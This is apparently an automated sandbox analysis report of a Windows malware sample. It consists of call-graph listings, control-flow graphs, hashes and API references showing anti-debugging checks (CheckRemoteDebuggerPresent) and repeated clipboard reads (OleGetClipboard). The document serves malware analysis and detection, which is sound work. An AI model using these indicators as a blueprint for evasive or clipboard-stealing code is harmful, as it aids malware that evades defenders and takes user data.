113000->112999 113001 5cf0700 2 API calls 113000->113001 113001->113000 113005 5cfb75b 113002->113005 113003 5cfbb0d 113003->112934 113004 5cf0700 2 API calls 113004->113005 113005->113003 113005->113004 113009 5cfc7a9 113006->113009 113007 5cfcb7f 113007->112934 113008 5cf0700 2 API calls 113008->113009 113009->113007 113009->113008 113013 5cfc7a9 113010->113013 113011 5cfcb7f 113011->112934 113012 5cf0700 2 API calls 113012->113013 113013->113011 113013->113012 113015 59d1ca4 GetSystemMetrics 113014->113015 113017 59d1d06 113014->113017 113016 59d1cc9 113015->113016 113016->112934 113017->112934 113020 5cf070f 113018->113020 113019 5cf0714 113019->112953 113020->113019 113030 5aeb590 113020->113030 113035 5aeb5a0 113020->113035 113021 5cf07df 113021->112953 113026 5cf06dd 113024->113026 113025 5cf0714 113025->112953 113026->113025 113028 5aeb5a0 2 API calls 113026->113028 113029 5aeb590 2 API calls 113026->113029 113027 5cf07df 113027->112953 113028->113027 113029->113027 113033 5aeb5a0 113030->113033 113031 5aeb5de 113031->113021 113032 5aeb8ec 113032->113021 113033->113031 113040 5aed2b8 113033->113040 113038 5aeb5a5 113035->113038 113036 5aeb5de 113036->113021 113037 5aeb8ec 113037->113021 113038->113036 113039 5aed2b8 2 API calls 113038->113039 113039->113037 113041 5aed296 113040->113041 113043 5aed2c2 113040->113043 113041->113032 113042 5aed912 113042->113032 113043->113042 113046 5aeda90 113043->113046 113051 5aeda80 113043->113051 113047 5aeda9f 113046->113047 113048 5aedaff OleGetClipboard 113046->113048 113047->113043 113050 5aedc24 113048->113050 113053 5aeda90 113051->113053 113052 5aeda9f 113052->113043 113053->113052 113054 5aedbda OleGetClipboard 113053->113054 113055 5aedc24 113054->113055 113056 57aae08 113058 57aae22 113056->113058 113057 57aaedb 113058->113057 113063 5cde2c8 113058->113063 113067 5cde2b8 113058->113067 113071 5aee2f0 113058->113071 113075 5aee300 113058->113075 113064 5cde2e9 113063->113064 113065 5cde3ea 113064->113065 113079 5cdef28 113064->113079 113065->113058 113068 5cde2e9 113067->113068 113069 5cde3ea 113068->113069 113070 5cdef28 2 API calls 113068->113070 113069->113058 113070->113069 113072 5aee2f3 113071->113072 113073 5aee48e 113072->113073 113074 5cdef28 2 API calls 113072->113074 113073->113058 113074->113073 113076 5aee324 113075->113076 113077 5aee48e 113076->113077 113078 5cdef28 2 API calls 113076->113078 113077->113058 113078->113077 113081 5cdef47 113079->113081 113080 5cdef6a 113080->113065 113081->113080 113083 5aeb5a0 2 API calls 113081->113083 113084 5aeb590 2 API calls 113081->113084 113082 5cdf015 113082->113065 113083->113082 113084->113082 112889 5aed198 112890 5aed1a3 112889->112890 112892 5aed1b3 112890->112892 112893 5aec4d0 112890->112893 112894 5aed1e8 OleInitialize 112893->112894 112895 5aed26f 112894->112895 112895->112892 112887 5aecb80 DuplicateHandle 112888 5aecc5d 112887->112888 112896 5ae2890 112897 5ae28ad 112896->112897 112901 57a6f38 112897->112901 112905 57a6f28 112897->112905 112898 5ae3193 112902 57a6f4d 112901->112902 112909 57a03ac 112902->112909 112906 57a6f38 112905->112906 112907 57a03ac CheckRemoteDebuggerPresent 112906->112907 112908 57a6f6a 112907->112908 112908->112898 112910 57a6fb0 CheckRemoteDebuggerPresent 112909->112910 112912 57a6f6a 112910->112912 112912->112898 113085 5ae61d1 113089 5ae6610 113085->113089 113094 5ae6600 113085->113094 113086 5ae61e9 113091 5ae6618 113089->113091 113090 5ae662c 113090->113086 113091->113090 113099 5ae6648 113091->113099 113092 5ae6641 113092->113086 113096 5ae6610 113094->113096 113095 5ae662c 113095->113086 113096->113095 113098 5ae6648 OleGetClipboard 113096->113098 113097 5ae6641 113097->113086 113098->113097 113100 5ae666a 113099->113100 113101 5ae6685 113100->113101 113103 5ae66c9 113100->113103 113107 5ae6648 OleGetClipboard 113101->113107 113109 5ae6718 113101->113109 113102 5ae668b 113102->113092 113105 5ae6749 113103->113105 113114 5aed9d8 113103->113114 113105->113092 113107->113102 113110 5ae6730 113109->113110 113112 5ae6749 113110->113112 113113 5aed9d8 OleGetClipboard 113110->113113 113111 5ae6767 113111->113102 113112->113102 113113->113111 113116 5aed9fd 113114->113116 113117 5ae6767 113116->113117 113118 5aec5e8 113116->113118 113117->113092 113119 5aedb58 OleGetClipboard 113118->113119 113121 5aedc24 113119->113121

                                                                                                Executed Functions

                                                                                                Function 059D1CF9 Relevance: 9.7, APIs: 1, Strings: 4, Instructions: 959COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1199 59d1cf9-59d1d04 1200 59d1ca4-59d1cc7 GetSystemMetrics 1199->1200 1201 59d1d06 1199->1201 1204 59d1cc9-59d1ccf 1200->1204 1205 59d1cd0-59d1cf6 1200->1205 1202 59d1d0d-59d1d2f 1201->1202 1203 59d1d08-59d1d0c 1201->1203 1207 59d1d32-59d1d36 1202->1207 1203->1202 1204->1205 1208 59d1d3f-59d1d43 1207->1208 1209 59d1d38 1207->1209 1208->1207 1211 59d1d45-59d1dbd 1208->1211 1209->1208 1478 59d1dc0 call 5ad0750 1211->1478 1479 59d1dc0 call 5ad0742 1211->1479 1222 59d1dc5-59d1ddd 1224 59d2c9e-59d2ca5 1222->1224 1225 59d1de3-59d1dec 1222->1225 1226 59d2c8e-59d2c93 1225->1226 1227 59d1df2-59d1e08 1225->1227 1226->1224 1227->1224 1230 59d1e0e-59d1e74 1227->1230 1235 59d1f0a-59d1f2a 1230->1235 1236 59d1e7a-59d1eff 1230->1236 1237 59d1fcc-59d2004 1235->1237 1238 59d1f30-59d1fc9 1235->1238 1236->1235 1239 59d200a-59d20bb 1237->1239 1240 59d20c1-59d22e5 1237->1240 1238->1237 1239->1240 1300 59d22e7-59d2326 1240->1300 1301 59d2331-59d2372 1240->1301 1300->1301 1308 59d2378-59d2391 1301->1308 1309 59d2c37-59d2c63 1301->1309 1314 59d23e8-59d2404 1308->1314 1315 59d2393-59d23dd 1308->1315 1316 59d2c6e 1309->1316 1317 59d2c65 1309->1317 1318 59d240a-59d248a 1314->1318 1319 59d2490-59d24c1 1314->1319 1315->1314 1316->1226 1317->1316 1318->1319 1327 59d24c7-59d24ce 1319->1327 1328 59d2c23-59d2c31 1319->1328 1330 59d2508-59d2528 1327->1330 1331 59d24d0-59d24fd 1327->1331 1328->1308 1328->1309 1334 59d252e-59d25af 1330->1334 1335 59d25b5-59d2670 1330->1335 1331->1330 1334->1335 1369 59d26aa-59d26ca 1335->1369 1370 59d2672-59d269f 1335->1370 1371 59d2757-59d280f 1369->1371 1372 59d26d0-59d2751 1369->1372 1370->1369 1398 59d2849-59d2869 1371->1398 1399 59d2811-59d283e 1371->1399 1372->1371 1400 59d286f-59d28f0 1398->1400 1401 59d28f6-59d2c1d 1398->1401 1399->1398 1400->1401 1401->1328 1478->1222 1479->1222
                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32(00000050), ref: 059D1CB3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681766157.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_59d0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID: PH^q$$^q$$^q$$^q
                                                                                                • API String ID: 4116985748-1351197249
                                                                                                • Opcode ID: 58a5ccc50d1db59d896b374035950fbb0673915f0e0cd0edd264690343031327
                                                                                                • Instruction ID: 19e47e1b53d17e33d077c63bb6f18bac731da222b5a4eb6feed862b8a5700ed7
                                                                                                • Opcode Fuzzy Hash: 58a5ccc50d1db59d896b374035950fbb0673915f0e0cd0edd264690343031327
                                                                                                • Instruction Fuzzy Hash: 41921574A102188FDB55EFB4D948B9DBBB6BF88300F1084AAE50AA7354DF359D85CF90
                                                                                                Function 059D1D08 Relevance: 5.9, Strings: 4, Instructions: 937COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1957 59d1d08-59d1d2f 1959 59d1d32-59d1d36 1957->1959 1960 59d1d3f-59d1d43 1959->1960 1961 59d1d38 1959->1961 1960->1959 1962 59d1d45-59d1dbd 1960->1962 1961->1960 2229 59d1dc0 call 5ad0750 1962->2229 2230 59d1dc0 call 5ad0742 1962->2230 1973 59d1dc5-59d1ddd 1975 59d2c9e-59d2ca5 1973->1975 1976 59d1de3-59d1dec 1973->1976 1977 59d2c8e-59d2c93 1976->1977 1978 59d1df2-59d1e08 1976->1978 1977->1975 1978->1975 1981 59d1e0e-59d1e74 1978->1981 1986 59d1f0a-59d1f2a 1981->1986 1987 59d1e7a-59d1eff 1981->1987 1988 59d1fcc-59d2004 1986->1988 1989 59d1f30-59d1fc9 1986->1989 1987->1986 1990 59d200a-59d20bb 1988->1990 1991 59d20c1-59d22e5 1988->1991 1989->1988 1990->1991 2051 59d22e7-59d2326 1991->2051 2052 59d2331-59d2372 1991->2052 2051->2052 2059 59d2378-59d2391 2052->2059 2060 59d2c37-59d2c63 2052->2060 2065 59d23e8-59d2404 2059->2065 2066 59d2393-59d23dd 2059->2066 2067 59d2c6e 2060->2067 2068 59d2c65 2060->2068 2069 59d240a-59d248a 2065->2069 2070 59d2490-59d24c1 2065->2070 2066->2065 2067->1977 2068->2067 2069->2070 2078 59d24c7-59d24ce 2070->2078 2079 59d2c23-59d2c31 2070->2079 2081 59d2508-59d2528 2078->2081 2082 59d24d0-59d24fd 2078->2082 2079->2059 2079->2060 2085 59d252e-59d25af 2081->2085 2086 59d25b5-59d2670 2081->2086 2082->2081 2085->2086 2120 59d26aa-59d26ca 2086->2120 2121 59d2672-59d269f 2086->2121 2122 59d2757-59d280f 2120->2122 2123 59d26d0-59d2751 2120->2123 2121->2120 2149 59d2849-59d2869 2122->2149 2150 59d2811-59d283e 2122->2150 2123->2122 2151 59d286f-59d28f0 2149->2151 2152 59d28f6-59d2c1d 2149->2152 2150->2149 2151->2152 2152->2079 2229->1973 2230->1973
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681766157.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_59d0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PH^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-1351197249
                                                                                                • Opcode ID: 5d1a4fae3383a7cbd2ca48bcc03f177e5d5c717d14e4afcbd25a7f6450ab092f
                                                                                                • Instruction ID: b5552673068059f5134545d91e68d9abbfd0e86149b1eb887d2655d38f9a20db
                                                                                                • Opcode Fuzzy Hash: 5d1a4fae3383a7cbd2ca48bcc03f177e5d5c717d14e4afcbd25a7f6450ab092f
                                                                                                • Instruction Fuzzy Hash: 96920674A102188FDB55EFB4D948B9DBBB6BF88300F1084AAE50AA7354DF359D85CF90
                                                                                                Function 05CDD320 Relevance: 3.3, Strings: 2, Instructions: 801COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2328 5cdd320-5cdd33d 2330 5cdd33f-5cdd342 2328->2330 2331 5cdd34c-5cdd34f 2330->2331 2332 5cdd344-5cdd34b 2330->2332 2333 5cdd351-5cdd35d 2331->2333 2334 5cdd362-5cdd365 2331->2334 2333->2334 2335 5cdd36f-5cdd372 2334->2335 2336 5cdd367-5cdd36c 2334->2336 2337 5cdd395-5cdd398 2335->2337 2338 5cdd374-5cdd37e 2335->2338 2336->2335 2341 5cdd3ab-5cdd3ae 2337->2341 2342 5cdd39a 2337->2342 2339 5cdddb5-5cdddde 2338->2339 2340 5cdd384-5cdd38e 2338->2340 2353 5cddde0-5cddde3 2339->2353 2340->2333 2351 5cdd390 2340->2351 2343 5cddd9b-5cddda7 2341->2343 2344 5cdd3b4-5cdd3b7 2341->2344 2592 5cdd39a call 5cddd8d 2342->2592 2593 5cdd39a call 5cddd84 2342->2593 2594 5cdd39a call 5cdd310 2342->2594 2595 5cdd39a call 5cdd320 2342->2595 2596 5cdd39a call 5cdddc0 2342->2596 2347 5cdddad-5cdddb4 2343->2347 2348 5cdd3b9-5cdd3c5 2343->2348 2344->2348 2350 5cdd3d4-5cdd3d7 2344->2350 2346 5cdd3a0-5cdd3a6 2346->2341 2348->2339 2352 5cdd3cb-5cdd3cf 2348->2352 2354 5cdd3fe-5cdd400 2350->2354 2355 5cdd3d9-5cdd3e3 2350->2355 2351->2337 2352->2350 2359 5cdde5b-5cdde5d 2353->2359 2360 5cddde5-5cdde11 call 5cddf67 2353->2360 2357 5cdd407-5cdd40a 2354->2357 2358 5cdd402 2354->2358 2355->2339 2356 5cdd3e9-5cdd3f3 2355->2356 2356->2333 2367 5cdd3f9 2356->2367 2357->2330 2361 5cdd410-5cdd41e 2357->2361 2358->2357 2362 5cdde5f 2359->2362 2363 5cdde64-5cdde67 2359->2363 2384 5cdde19-5cdde56 2360->2384 2370 5cddd98 2361->2370 2371 5cdd424-5cdd4e7 2361->2371 2362->2363 2363->2353 2366 5cdde6d-5cddf1d 2363->2366 2430 5cddf24-5cddf64 2366->2430 2367->2354 2370->2343 2415 5cdd4ed-5cdd4fb 2371->2415 2416 5cddd4a-5cddd76 2371->2416 2384->2359 2422 5cdd4fd-5cdd503 2415->2422 2423 5cdd513-5cdd517 2415->2423 2424 5cddd78 2416->2424 2425 5cddd81 2416->2425 2428 5cdd505 2422->2428 2429 5cdd507-5cdd509 2422->2429 2426 5cdd519-5cdd521 2423->2426 2427 5cdd526-5cdd595 2423->2427 2424->2425 2425->2370 2431 5cdd5b1-5cdd5c1 2426->2431 2461 5cdd597-5cdd59f 2427->2461 2462 5cdd5a1-5cdd5ab 2427->2462 2428->2423 2429->2423 2432 5cdd5c7-5cdd703 2431->2432 2433 5cddd36-5cddd44 2431->2433 2477 5cdd72b-5cdd74f 2432->2477 2478 5cdd705-5cdd729 2432->2478 2433->2415 2433->2416 2461->2431 2462->2431 2479 5cdd755-5cdd8aa 2477->2479 2478->2479 2504 5cdd8ac-5cdd8d0 2479->2504 2505 5cdd8d2-5cdd8f8 2479->2505 2506 5cdd8fe-5cdda3f 2504->2506 2505->2506 2533 5cdda57-5cdda71 2506->2533 2534 5cdda41-5cdda55 2506->2534 2535 5cdda77-5cddd30 2533->2535 2534->2535 2535->2433 2592->2346 2593->2346 2594->2346 2595->2346 2596->2346
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682164039.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5cd0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0oAp$PH^q
                                                                                                • API String ID: 0-2857532937
                                                                                                • Opcode ID: e42a6291b8b89d12fd8af9f0596c8416aefb0dadda26b97422696f61b94f8330
                                                                                                • Instruction ID: e4adf9fc9138bcd19dfaa5a7e2a4b29861ad9d1f9e430a6cf51d0d91c0544d4a
                                                                                                • Opcode Fuzzy Hash: e42a6291b8b89d12fd8af9f0596c8416aefb0dadda26b97422696f61b94f8330
                                                                                                • Instruction Fuzzy Hash: A672E374E102198FDB549FB5E848A9DBBB6FF48305F1088A9E50AE7321DF349E819F50
                                                                                                Function 05CD72D7 Relevance: 1.8, Instructions: 1823COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682164039.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5cd0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3222bf46bb4b626205efa056f40e154abbafb5fd5d6e0fea8710c0a55302f455
                                                                                                • Instruction ID: 3dd311bb1c1d2fb41ef221c2ade6f9a03bba077cfd3d6451b2a3de5a2cb15373
                                                                                                • Opcode Fuzzy Hash: 3222bf46bb4b626205efa056f40e154abbafb5fd5d6e0fea8710c0a55302f455
                                                                                                • Instruction Fuzzy Hash: 1823A178D10229CFCB65AFB4DD49A9EBBB5BF88301F1044E9E509A7251DB359E82CF40
                                                                                                Function 05CD72E8 Relevance: 1.8, Instructions: 1818COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682164039.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5cd0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a48bdab9dfcb883eb3084a37fc7ea13d1dce24e7933bb520ef92aca432a475a7
                                                                                                • Instruction ID: c2f6faa4beb17007b342bcf4e58e8bb35727215fd70497ff50ffd7c50ed24674
                                                                                                • Opcode Fuzzy Hash: a48bdab9dfcb883eb3084a37fc7ea13d1dce24e7933bb520ef92aca432a475a7
                                                                                                • Instruction Fuzzy Hash: 0F23A178D10229CFCB65AFB4DD49A9EBBB5BF88301F1044E9E509A7251DB359E82CF40
                                                                                                Function 057A6FA8 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 057A704C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681457172.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_57a0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                • String ID:
                                                                                                • API String ID: 3662101638-0
                                                                                                • Opcode ID: 2584c138ab2f52d3ca9c5726864c98fd81822bcf8272bf3d1437c685ad57ba68
                                                                                                • Instruction ID: 192854843ae182aa9d6fe8e974a1a9c2f20fe3576f7131032713bab86bcebc3a
                                                                                                • Opcode Fuzzy Hash: 2584c138ab2f52d3ca9c5726864c98fd81822bcf8272bf3d1437c685ad57ba68
                                                                                                • Instruction Fuzzy Hash: 3D41CBB5D04258DFCB10CFA9D484AEEFBF4EB49310F24906AE455B7250D378AA85CF64
                                                                                                Function 057A03AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 057A704C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681457172.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_57a0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                • String ID:
                                                                                                • API String ID: 3662101638-0
                                                                                                • Opcode ID: dba8577d4d7b0320738b61197627515a78a8bbaf93ae9eb3c6bba94c4cfa3bac
                                                                                                • Instruction ID: 3d8d17ef55a9a447c84563f742862633b8e1223a73acb827a3b61b9e316ada8f
                                                                                                • Opcode Fuzzy Hash: dba8577d4d7b0320738b61197627515a78a8bbaf93ae9eb3c6bba94c4cfa3bac
                                                                                                • Instruction Fuzzy Hash: 0F41C9B5D04258DFCB10CFA9D484AEEFBF4EB49310F24906AE854B7250D378AA85CF64
                                                                                                Function 05ADD4A1 Relevance: 1.0, Instructions: 1029COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682030189.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ad0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c451271febb4bcf19535273faa03aa099056c4245b9ab75c05c3b3cdab508f78
                                                                                                • Instruction ID: b1e2df42ac25e25d7ad0a9cd3ad6423643b4ca6dcbc9911bbd4edcfa70c03d5d
                                                                                                • Opcode Fuzzy Hash: c451271febb4bcf19535273faa03aa099056c4245b9ab75c05c3b3cdab508f78
                                                                                                • Instruction Fuzzy Hash: AAB2C274D112298FCB64AFB4E949A9DBBB2FF48300F5085E9E409A7321DB359E81DF50
                                                                                                Function 05ADD618 Relevance: .9, Instructions: 907COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682030189.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ad0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40f0ef2eb961b79880713ff9ac6c36c1ae5836cc9820e7b00033e07038c4fe89
                                                                                                • Instruction ID: ca3acc6f28c006eff428150e12d58e888a17d01d9eb277b7cc8e81531e1a9b53
                                                                                                • Opcode Fuzzy Hash: 40f0ef2eb961b79880713ff9ac6c36c1ae5836cc9820e7b00033e07038c4fe89
                                                                                                • Instruction Fuzzy Hash: 81A2B174D11229CFCB64AFB4E949A9DBBB1BF48301F5089E9E409A7321DB359E81DF40
                                                                                                Function 05CD0006 Relevance: .8, Instructions: 828COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682164039.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5cd0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5090e689010014e627c38d3f9e5ab78c3dcb0219904d38bc80de856ddf643363
                                                                                                • Instruction ID: b3e32fd93eb1947180eea3b0ffeea8c361c37fba7baad43c6e3eaef4c865a490
                                                                                                • Opcode Fuzzy Hash: 5090e689010014e627c38d3f9e5ab78c3dcb0219904d38bc80de856ddf643363
                                                                                                • Instruction Fuzzy Hash: D8929178D11229CFCB64AFB4D949A9DBBB2BF88301F1045E9E509A7315DB359E82CF40
                                                                                                Function 057A4440 Relevance: .4, Instructions: 412COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681457172.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_57a0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 31998253c553a57d9448f348c91a80eafa91b19f06f98b024f2b33e81ac2167c
                                                                                                • Instruction ID: 74c3812f24f97708da3eaf88fcb7e73b21f14f110544745f48086f3cd61b1d53
                                                                                                • Opcode Fuzzy Hash: 31998253c553a57d9448f348c91a80eafa91b19f06f98b024f2b33e81ac2167c
                                                                                                • Instruction Fuzzy Hash: F202D571D002598FDF20CFA8C885B9DBBF2BF89304F1482AAD409B7250EB759A85DF55
                                                                                                Function 057A5270 Relevance: .4, Instructions: 387COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681457172.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_57a0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 30e9792badff77987b8382a150f1c0ab5927efa7103c0041acfc38c3ceda433d
                                                                                                • Instruction ID: 451fbb6c8936cc1b192b8b3831a9dddfbd1f299e4319f5dacca4e3f4fc634cce
                                                                                                • Opcode Fuzzy Hash: 30e9792badff77987b8382a150f1c0ab5927efa7103c0041acfc38c3ceda433d
                                                                                                • Instruction Fuzzy Hash: A9F1C4B1D00219CFDF20CFA9D981B9DBBF2BB89314F1482A9D809B7250EB749985CF51
                                                                                                Function 05CF5920 Relevance: .3, Instructions: 304COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682229099.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5cf0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5ba87299078c7278a81854d687af1fd2f0e5c08f808bacddc3a548ea0f217162
                                                                                                • Instruction ID: 82880764855614cb33c718876a4ebeae16565deb84d7db723ee125697af9e287
                                                                                                • Opcode Fuzzy Hash: 5ba87299078c7278a81854d687af1fd2f0e5c08f808bacddc3a548ea0f217162
                                                                                                • Instruction Fuzzy Hash: 3EC11675E002199FCB14DFA9D844A9EFBF6FF49310F14882AE609E7360DB359946CB90
                                                                                                Function 008811D3 Relevance: .3, Instructions: 291COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1677331734.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_880000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 617d60d061d949a529294d5730c4b3cef7ea9f3a25fe15fed6458c79ca260584
                                                                                                • Instruction ID: 8c369aacd358931afca81fd47e94e5afdba8b0023e7a4845ce00a3ae1963e552
                                                                                                • Opcode Fuzzy Hash: 617d60d061d949a529294d5730c4b3cef7ea9f3a25fe15fed6458c79ca260584
                                                                                                • Instruction Fuzzy Hash: 39D1CA70D552298FDBA0DF64C8887E9BBB5BB4A304F2095EAD40DA3250DB759EC9CF10
                                                                                                Function 059D3288 Relevance: .3, Instructions: 255COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681766157.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_59d0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7e6bd72c9cd5330cb2f0f47063914aab6ebd3bd072e352f49b0a52dcb45c4c0c
                                                                                                • Instruction ID: 387030ff79ac5a8ab33c3fd33fd8fd182a035bcfa5ecf51873e2273846b85161
                                                                                                • Opcode Fuzzy Hash: 7e6bd72c9cd5330cb2f0f47063914aab6ebd3bd072e352f49b0a52dcb45c4c0c
                                                                                                • Instruction Fuzzy Hash: 1AD13AB19217468BD710CFA4EC4A3897FB1BB45324F594309E161AF6E1DBB814AACFC4
                                                                                                Function 00883A08 Relevance: .2, Instructions: 151COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1677331734.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_880000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b69e7c5f869924daa58ccd70175fcb5b219f8da124e830d1f189b608b6ce4aaa
                                                                                                • Instruction ID: b8cb9bafc2377e3d60fd23916aac72d5f79b261e8fe1477043be4beb021aa3e6
                                                                                                • Opcode Fuzzy Hash: b69e7c5f869924daa58ccd70175fcb5b219f8da124e830d1f189b608b6ce4aaa
                                                                                                • Instruction Fuzzy Hash: 5C512970D05729CAEB24DF66C9447EAF7B6FF9A304F2091A9D048B7250DBB45A88CF41
                                                                                                Function 00881040 Relevance: .1, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1677331734.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_880000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5526c673429d67b91dbc1376ef31620e34d15c2be20c203d68604930bf205250
                                                                                                • Instruction ID: 569a87a03968fe0f1d1249d6c625f70abd6a140f1eb9596a8894e2d7b9354b9a
                                                                                                • Opcode Fuzzy Hash: 5526c673429d67b91dbc1376ef31620e34d15c2be20c203d68604930bf205250
